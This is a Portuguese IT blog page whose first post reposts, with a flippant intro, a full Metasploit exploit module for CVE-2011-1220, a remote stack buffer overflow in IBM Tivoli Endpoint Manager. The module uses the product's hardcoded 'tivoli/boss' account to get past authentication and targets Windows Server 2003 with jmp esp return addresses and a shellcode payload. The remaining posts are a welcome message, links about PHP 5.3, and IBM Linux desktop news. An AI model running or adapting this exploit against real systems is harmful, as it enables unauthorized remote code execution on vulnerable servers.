IBM Tivoli Endpoint Manager POST Query Buffer Overflow

Standard

Um pouquinho de overflow não faz mal para ninguém:

##
# $Id: ibm_tivoli_endpoint_bof.rb 12925 2011-06-12 00:04:55Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'IBM Tivoli Endpoint Manager POST Query Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the way IBM Tivoli
Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query
arguments.

This issue can be triggered by sending a specially crafted HTTP POST request to
the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization
is required. This exploit makes use of a second vulnerability, a hardcoded account
(tivoli/boss) is used to bypass the authorization restriction.
},
'Author' =>
[
'bannedit', # metasploit module
'Jeremy Brown <0xjbrown[at]gmail.com>', # original public exploit
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12925 $',
'References' =>
[
[ 'CVE', '2011-1220'],
[ 'OSVDB', '72713'], # buffer overflow
[ 'OSVDB', '72751'], # hardcoded account
[ 'BID', '48049'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-169/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "x00x0dx0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows Server 2003 SP0', { 'Ret' => 0x77d80787 }], # user32.dll - jmp esp
['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp
['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp
],
'DisclosureDate' => 'May 31 2011'))

register_options(
[
Opt::RPORT(9495),
], self.class )
end

def exploit
print_status("Trying target #{target.name}...")

auth = Rex::Text.encode_base64("tivoli:boss")
varname = rand_text_alpha(rand(10))

sploit = make_nops(1) * 256
sploit << [target.ret].pack('V') sploit << payload.encoded print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") res = send_request_cgi({ 'uri' => '/addr',
'method' => 'POST',
'headers' =>
{
'Authorization' => "Basic #{auth}"
},
'vars_post' =>
{
varname => sploit,
},
}, 5)

handler
end
end

Fonte: http://www.exploit-db.com/exploits/17392/

Hello world!

Standard

Esse termo Hello World é interessante, por que se observarmos o cidadão torna-se bem vindo ao mundo… rsrsrs, sem graça não é? Sim, mas faz sentido aqui em 2 situações:

Hello Nerd World and Hello Program World.

Seja bem vindo ao nosso site de How Tos e “contos de TI”.
Divirta-se ou aprenda algo interessante.

Prometemos How tos sobre Redes, PHP, Mysql, Postgres, Windows, BSD e Gnu/Linux, sem contar notícias sobre Apple, Sun, IBM e outros “monstrinhos” do mercado de TI, como Red Hat e a “pequenina” GOOGLE.

Obrigado por nos prestigiar.

O que há de novo no PHP 5.3?

Standard

Em alguns instantes os desenvolvedores PHP se perguntam:

O que há de novo no PHP 5.3?

Aqui está a resposta elaborada por parte da IBM em um overview interessante e dividido em 2 partes (até o momento):

http://www.ibm.com/developerworks/opensource/library/os-php-5.3new1/?ca=dgr-lnxw07PHPv5.3P1&S_TACT=105AGX59&S_CMP=GRsitelnxw01
http://www.ibm.com/developerworks/opensource/library/os-php-5.3new2/index.html?ca=dgr-lnxw01os-php-5.3new2&S_TACT=105AGX59&S_CMP=GRsitelnxw01

Fonte: www.tinews.org

Ibm lança Microsoft-Free Linux Virtual Desktop

Standard

Repassando a nota oficial:

“According to Information Week, IBM has introduced a line of business computers that avoid Microsoft’s desktop environment in favor of open source software. IBM worked with Canonical and Virtual Bridges to create the platform, which IBM claims saves businesses $500 to $800 per user on software licenses and an additional $258 per user ‘since there is no need to upgrade hardware to support Vista and Office.'”

fonte: http://www.cyberlinux.com.br